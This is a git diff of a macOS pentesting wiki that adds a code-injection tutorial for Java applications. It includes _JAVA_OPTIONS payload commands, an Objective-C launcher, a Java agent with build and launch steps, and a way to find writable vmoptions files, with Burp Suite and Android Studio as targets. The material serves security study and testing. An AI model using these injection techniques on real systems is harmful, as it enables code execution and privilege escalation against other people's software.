GITBOOK-4189: change request with no subject merged in GitBook

2023-12-13 23:28:49 +00:00 · 2023-12-13 23:28:49 +00:00 · d3fb573918
parent a4f29b80da
commit d3fb573918
3 changed files with 126 additions and 7 deletions
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
@ -93,6 +93,10 @@ grabbed's writeToFile:"/Users/xpn/Library/Containers/com.apple.iWork.Pages/Data/
 [**Malicious .xib file that executes arbitrary code example.**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4)
 {% endhint %}

+## Create your own DirtyNIB
+
+
+
 ## Launch Constraints

 They basically **prevent executing applications outside of their expected locations**, so if you copy an application protected by Launch Constrains to `/tmp` you won't be able to execute it.\
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@ -154,6 +154,8 @@ NODE_OPTIONS="--require /tmp/payload.js" ELECTRON_RUN_AS_NODE=1 /Applications/Di

 {% hint style="danger" %}
 If the fuse **`EnableNodeOptionsEnvironmentVariable`** is **disabled**, the app will **ignore**  the env var **NODE\_OPTIONS** when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set, which will be also **ignored** if the fuse **`RunAsNode`** is disabled.
+
+If you don't set **`ELECTRON_RUN_AS_NODE`** , you will find the **error**: `Most NODE_OPTIONs are not supported in packaged apps. See documentation for more details.`
 {% endhint %}

 ### Injection from the App Plist
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md
@ -1,4 +1,4 @@
-# macOS Java apps Injection
+# macOS Java Applications Injection

 <details>

@ -12,33 +12,91 @@

 </details>

+## Enumeration
+
+Find Java applications installed in your system. It was noticed that Java apps in the **Info.plist** will contain some java parameters which contain the string **`java.`**, so you can search for that:
+
+```bash
+# Search only in /Applications folder
+sudo find /Applications -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
+
+# Full search
+sudo find / -name 'Info.plist' -exec grep -l "java\." {} \; 2>/dev/null
+```
+
 ## \_JAVA\_OPTIONS

 The env variable **`_JAVA_OPTIONS`** can be used to inject arbitrary java parameters in the execution of a java compiled app:

 ```bash
 # Write your payload in a script called /tmp/payload.sh
-export _JAVA_OPTIONS='-Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
+export _JAVA_OPTIONS='-Xms2m -Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
 "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
 ```

+To execute it as a new process and not as a child of the current terminal you can use:
+
+```objectivec
+#import <Foundation/Foundation.h>
+// clang -fobjc-arc -framework Foundation invoker.m -o invoker
+
+int main(int argc, const char * argv[]) {
+    @autoreleasepool {
+        // Create a new task
+        NSTask *task = [[NSTask alloc] init];
+
+        /// Set the task's launch path to use the 'open' command
+        [task setLaunchPath:@"/usr/bin/open"];
+
+        // Arguments for the 'open' command, specifying the path to Android Studio
+        [task setArguments:@[@"/Applications/Android Studio.app"]];
+
+        // Define custom environment variables
+        NSDictionary *customEnvironment = @{
+            @"_JAVA_OPTIONS": @"-Xms2m -Xmx5m -XX:OnOutOfMemoryError=/tmp/payload.sh"
+        };
+
+        // Get the current environment and merge it with custom variables
+        NSMutableDictionary *environment = [NSMutableDictionary dictionaryWithDictionary:[[NSProcessInfo processInfo] environment]];
+        [environment addEntriesFromDictionary:customEnvironment];
+
+        // Set the task's environment
+        [task setEnvironment:environment];
+
+        // Launch the task
+        [task launch];
+    }
+    return 0;
+}
+```
+
 However, that will trigger an error on the executed app, another more stealth way is to create a java agent and use:

 ```bash
-export _JAVA_OPTIONS='-javaagent:agent.jar'
+export _JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'
 "/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
+
+# Or
+
+open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
 ```

+{% hint style="danger" %}
+Creating the agent with a **different Java version** from the application can crash the execution of both the agent and the application
+{% endhint %}
+
 Where the agent can be:

+{% code title="Agent.java" %}
 ```java
 import java.io.*;
 import java.lang.instrument.*;

-public class Hax {
+public class Agent {
  public static void premain(String args, Instrumentation inst) {
    try {
-      Process p = Runtime.getRuntime().exec("open -a Calculator");
+      String[] commands = new String[] { "/usr/bin/open", "-a", "Calculator" };
+      Runtime.getRuntime().exec(commands);
    }
    catch (Exception err) {
      err.printStackTrace();
@ -46,11 +104,66 @@ public class Hax {
  }
 }
 ```
+{% endcode %}

-## vmoptions.txt
+To compile the agent run:
+
+```bash
+javac Agent.java # Create Agent.class
+jar cvfm Agent.jar manifest.txt Agent.class # Create Agent.jar
+```
+
+With `manifest.txt`:
+
+```
+Premain-Class: Agent
+Agent-Class: Agent
+Can-Redefine-Classes: true
+Can-Retransform-Classes: true
+```
+
+And then export the env variable and run the java application like:
+
+```bash
+export _JAVA_OPTIONS='-javaagent:/tmp/j/Agent.jar'
+"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
+
+# Or
+
+open --env "_JAVA_OPTIONS='-javaagent:/tmp/Agent.jar'" -a "Burp Suite Professional"
+```
+
+## vmoptions file

 This file support the specification of **Java params** when Java is executed. You could use some of the previous tricks to change the java params and **make the process execute arbitrary commands**.\
-Moreover, this file can also include others, so you could also change an included file.
+Moreover, this file can also **include others** with the `include` directory, so you could also change an included file.
+
+Even more, some Java apps will **load more than one `vmoptions`** file.
+
+Some applications like Android Studio indicates in their **output where are they looking** for these files, like:
+
+```bash
+/Applications/Android\ Studio.app/Contents/MacOS/studio 2>&1 | grep vmoptions
+
+2023-12-13 19:53:23.920 studio[74913:581359] fullFileName is: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
+2023-12-13 19:53:23.920 studio[74913:581359] fullFileName exists: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
+2023-12-13 19:53:23.920 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app/Contents/bin/studio.vmoptions
+2023-12-13 19:53:23.921 studio[74913:581359] parseVMOptions: /Applications/Android Studio.app.vmoptions
+2023-12-13 19:53:23.922 studio[74913:581359] parseVMOptions: /Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
+2023-12-13 19:53:23.923 studio[74913:581359] parseVMOptions: platform=20 user=1 file=/Users/carlospolop/Library/Application Support/Google/AndroidStudio2022.3/studio.vmoptions
+```
+
+If they don't you can easily check for it with:
+
+```bash
+# Monitor
+sudo eslogger lookup | grep vmoption # Give FDA to the Terminal
+
+# Launch the Java app
+/Applications/Android\ Studio.app/Contents/MacOS/studio
+```
+
+Note how interesting is that Android Studio in this example is trying to load the file **`/Applications/Android Studio.app.vmoptions`**, a place where any user from the **`admin` group has write access.**

 <details>